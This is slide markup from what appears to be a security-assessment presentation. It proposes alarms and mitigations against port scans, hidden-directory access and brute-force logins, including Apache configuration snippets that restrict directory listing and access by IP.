            <a:off x="4642150" y="1701675"/>
            <a:ext cx="4364700" cy="274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406" name="Google Shape;406;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="202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407" name="Google Shape;407;p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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p20"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p2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190" name="Google Shape;190;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0"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="192" name="Google Shape;192;p2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3" name="Google Shape;193;p2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0"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195" name="Google Shape;195;p2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96" name="Google Shape;196;p20"/>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0"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="198" name="Google Shape;198;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9" name="Google Shape;199;p20"/>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0"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="201" name="Google Shape;201;p20"/>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2" name="Google Shape;202;p20"/>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0"/>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204" name="Google Shape;204;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 Security Assessment</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p20"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Log Analysis and Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p20"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Proposed Alarms and Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr b="1"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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Google Shape;413;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237375" y="1602450"/>
            <a:ext cx="4229400" cy="3031500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000"/>
              <a:t>An alarm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="6000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000"/>
              <a:t>can be set after 1000 connections have been made within an hour:</a:t>
            </a:r>
            <a:endParaRPr sz="6000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="6000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>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
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4825525" y="1467300"/>
            <a:ext cx="4304400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>In order to block future port scans, the following should be implemented: </a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Identify what normal host activity looks like and set up continuous log monitoring that alerts when thresholds for abnormal activity such as port scans or bruteforce is detected</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Configure firewall to first block all traffic, then override to allow only essential traffic</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Whitelist known IP addresses</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="415" name="Google Shape;415;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="237500" y="2244080"/>
            <a:ext cx="4229299" cy="23576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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-164700" y="1602450"/>
            <a:ext cx="47892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In order to detect future unauthorized access, set an alert that will trigger when threshold of &gt;0 requests for the hidden directory is exceeded.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
        <p:nvSpPr>
          <p:cNvPr id="422" name="Google Shape;422;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4730100" y="1535975"/>
            <a:ext cx="4339800" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1021"/>
              <a:t>In order to block future unwanted access, disable directory listing for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1021"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1021"/>
              <a:t> directories. This can be done by reconfiguring the Apache2 configuration file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1021"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1021"/>
              <a:t> the below settings:: </a:t>
            </a:r>
            <a:endParaRPr sz="1021"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>&lt;Directory /var/www/company_folders/secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="365760" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>Options -Indexes +FollowSymLinks</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="365760" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>Allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>Override None</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="365760" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>Require all granted</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>&lt;/Directory&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>sudo systemctl restart apache2</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1021"/>
              <a:t>Another option would be to configure httpd.conf file to restrict access by IP and whitelist known IP addresses to have access to hidden directories, and deny traffic to all others:</a:t>
            </a:r>
            <a:endParaRPr sz="1021"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>&lt;Directory /PATH/TO/WEBDIR/wp-admin&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>    # allow access from 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>    # and block everything else</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>    Require ip 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="821"/>
              <a:t>&lt;/Directory&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="821"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>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00"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p40"/>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429" name="Google Shape;429;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>To detect future brute force attacks, an alarm should be set to go off any time there are more than 10 failed login attempts (indicated by Error (401) responses) within 3 minutes. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
